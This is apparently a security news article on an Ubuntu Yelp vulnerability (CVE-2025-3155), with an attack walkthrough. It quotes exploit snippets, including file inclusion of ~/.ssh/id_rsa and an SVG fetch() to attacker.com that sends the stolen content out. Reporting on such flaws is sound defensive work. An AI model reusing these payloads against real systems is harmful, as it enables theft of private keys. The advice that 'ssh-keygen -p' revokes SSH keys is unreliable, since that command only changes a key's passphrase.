Cyber Security News

PoC Exploit Reveals SSH Key Exposure via Yelp Vulnerability on Ubuntu

Security researchers have uncovered a critical vulnerability (CVE-2025-3155) in Ubuntu’s default help browser Yelp that could expose sensitive system files including SSH private keys.

The flaw impacts Ubuntu desktop installations and stems from improper handling of XML content in GNOME’s help documentation system.

Technical Breakdown of CVE-2025-3155

Affected Systems:

  • Ubuntu 22.04 LTS and earlier desktop editions
  • Yelp versions ≤ 42.1
  • GNOME WebKitGTK components

Vulnerability Chain:

  1. URI Scheme Handling: Yelp registers as the default handler for ghelp:// URIs
  2. XInclude Exploitation: Mallard documentation format allows arbitrary file inclusion via:
<include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>
  1. SVG Script Injection: XSLT processing permits script execution through SVG tags:
<svg:script>onload=_=>fetch("http://attacker.com", {body:document.body})</svg:script>

Attack Scenario Walkthrough

  1. Attacker hosts malicious webpage with automatic download of crafted .page file
  2. Victim visits page triggering download to ~/Downloads folder
  3. Browser redirect triggers ghelp:///proc/self/cwd/Downloads URI
  4. Yelp processes malicious XML with:
    • File inclusion of ~/.ssh/id_rsa
    • Embedded SVG script exfiltrating data via HTTP POST

Key Exploit Code Snippet:

<script>

let payloadPage = `<?xml...>

  <include href="/proc/self/cwd/.ssh/id_rsa"/>

  <svg:script>onload=_=>fetch("http://attacker.com",...)</svg:script>`;

function exp() {

  const blob = new Blob([payloadPage], {type: 'text/plain'});

  const a = document.createElement('a');

  a.href = URL.createObjectURL(blob);

  a.download = 'index.page';

  a.click();

  location = 'ghelp:///proc/self/cwd/Downloads';

}

</script>

Mitigation and Response

  1. Update systems with:
    sudo apt update && sudo apt upgrade yelp
  2. Revoke SSH keys with:
    ssh-keygen -p -f ~/.ssh/id_rsa
  3. Avoid opening unexpected documentation files

Canonical has released patches in Ubuntu security updates dated April 7, 2025. Users are urged to apply updates immediately through standard package channels.

This vulnerability demonstrates three critical risks:

  1. Privilege Escalation: From basic document viewing to system file access
  2. Persistence Risk: Stolen SSH keys enable lateral network movement
  3. Phishing Vector: Requires minimal user interaction (single click)

Security researcher noted: “This chain shows how apparently harmless documentation tools can become attack vectors when combined with modern web technologies. The ghelp:// handler’s file inclusion capabilities create unexpected trust boundaries.”

Ongoing investigations continue to determine if this vulnerability was exploited in wild. Users and enterprises are advised to audit SSH key usage and monitor for suspicious authentication attempts.

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

BFDOOR Malware Targets Organizations to Establish Long-Term Persistence

The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations, particularly…

2 hours ago

Uncovering the Security Risks of Data Exposure in AI-Powered Tools like Snowflake’s CORTEX

As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search Service…

2 hours ago

UNC3944 Hackers Shift from SIM Swapping to Ransomware and Data Extortion

UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider, has…

2 hours ago

Over 2,800 Hacked Websites Targeting MacOS Users with AMOS Stealer Malware

Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800 compromised…

2 hours ago

Hackers Bypass AI Filters from Microsoft, Nvidia, and Meta Using a Simple Emoji

Cybersecurity researchers have uncovered a critical flaw in the content moderation systems of AI models…

3 hours ago

Microsoft Alerts That Default Helm Charts May Expose Kubernetes Apps to Data Leaks

Microsoft’s cybersecurity research team has issued a stark warning about the risks of using default…

3 hours ago